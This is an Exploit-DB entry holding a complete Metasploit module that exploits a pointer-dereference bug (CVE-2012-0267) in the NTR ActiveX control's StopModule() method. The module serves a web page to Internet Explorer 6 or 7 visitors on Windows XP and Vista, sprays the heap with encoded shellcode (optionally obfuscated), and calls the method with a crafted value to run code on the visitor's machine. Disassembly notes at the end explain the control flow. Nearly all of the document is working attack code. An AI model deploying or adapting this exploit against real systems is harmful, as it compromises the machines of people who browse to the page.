NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit)

EDB-ID:

21839




Platform:

Windows

Date:

2012-10-10


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn

	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "7.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:classid    => "{E6ACF817-0A85-4EBE-9F0A-096C6488CFEA}",
		:method     => "StopModule",
		:rank       => NormalRanking
	})


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NTR ActiveX Control StopModule() Remote Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The
				vulnerability exists in the StopModule() method, where the lModule parameter is
				used to dereference memory to get a function pointer, which leads to code execution
				under the context of the user visiting a malicious web page.
			},
			'Author'         =>
				[
					'Carsten Eiram', # Vulnerability discovery
					'juan vazquez' # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2012-0267' ],
					[ 'OSVDB', '78253' ],
					[ 'BID', '51374' ],
					[ 'URL', 'http://secunia.com/secunia_research/2012-2/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 1024,
					'DisableNops' => true,
					'BadChars'    => ""
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					# NTR ActiveX 1.1.8.0
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5f4'} ],
					[ 'IE 7 on Windows Vista',  { 'Rop' => nil, 'Offset' => '0x5f4'} ]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 11 2012',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class
		)

	end

	def get_spray(t, js_code, js_nops)

		spray = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();
		for (var z=1; z < 500; z++) {
			heap_obj.alloc(block);
		}

		JS

		return spray

	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'
		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
			return targets[1] #IE 6 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[2] #IE 7 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[3] #IE 7 on Windows Vista SP2
		else
			return nil
		end
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		print_status("User-agent: #{agent}")

		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have a setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		p = payload.encoded
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
		js = get_spray(my_target, js_code, js_nops)

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		address = 0x0c0c0c0c / 0x134

		html = <<-MYHTML
		<html>
		<body>
		<object classid='clsid:E6ACF817-0A85-4EBE-9F0A-096C6488CFEA' id='test'></object>
		<script>
		#{js}
		test.StopModule(#{address});
		</script>
		</body>
		</html>
		MYHTML

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end
end

=begin

The pointer is "controlled" here:

.text:10004449                 mov     eax, [ebp+arg_0] ; arg_0 is user controlled
.text:1000444C                 imul    eax, 134h       ; it looks good
.text:10004452                 lea     esi, [eax+edi]  ; eax is user controlled
.text:10004452                                         ; edi is a heap pointer initialized while activex loading
.text:10004452                                         ;     (Important note: the default heap isn't being used)
.text:10004452                                         ;
.text:10004452                                         ; edi:
.text:10004452                                         ;
.text:10004452                                         ; 0:000> !heap -p -a edi
.text:10004452                                         ;     address 01fb370c found in
.text:10004452                                         ;     _HEAP @ 1fb0000
.text:10004452                                         ;       HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
.text:10004452                                         ;         01fb3668 0373 0000  [01]   01fb3670    01b90 - (busy)
.text:10004452                                         ;           ? ntractivex118!DllUnregisterServer+10d18
.text:10004452                                         ;
.text:10004452                                         ; Initialization (while activex loading):
.text:10004452                                         ; ChildEBP RetAddr  Args to Child
.text:10004452                                         ; 00138510 02a4e147 00001b84 02a4e8fb 00001b84 ntdll!RtlAllocateHeap+0xeac
.text:10004452                                         ; 00138548 02a4939e 00000000 7dc43038 00e057f8 ntractivex118!DllUnregisterServer+0x8823
.text:10004452                                         ; 0013855c 7dea5401 02093628 00000000 7dc43038 ntractivex118!DllUnregisterServer+0x3a7a
.text:10004452                                         ; 00138598 7deaa7f8 00e057f8 00e06154 80004005 mshtml!COleSite::InstantiateObjectFromCF+0x114

And user to get RCE here:

.text:1000446E                 mov     eax, [esi+24h]  ; esi can be user influenced
.text:10004471                 test    eax, eax
.text:10004473                 jz      short loc_10004477
.text:10004475                 call    eax             ; RCE!

=end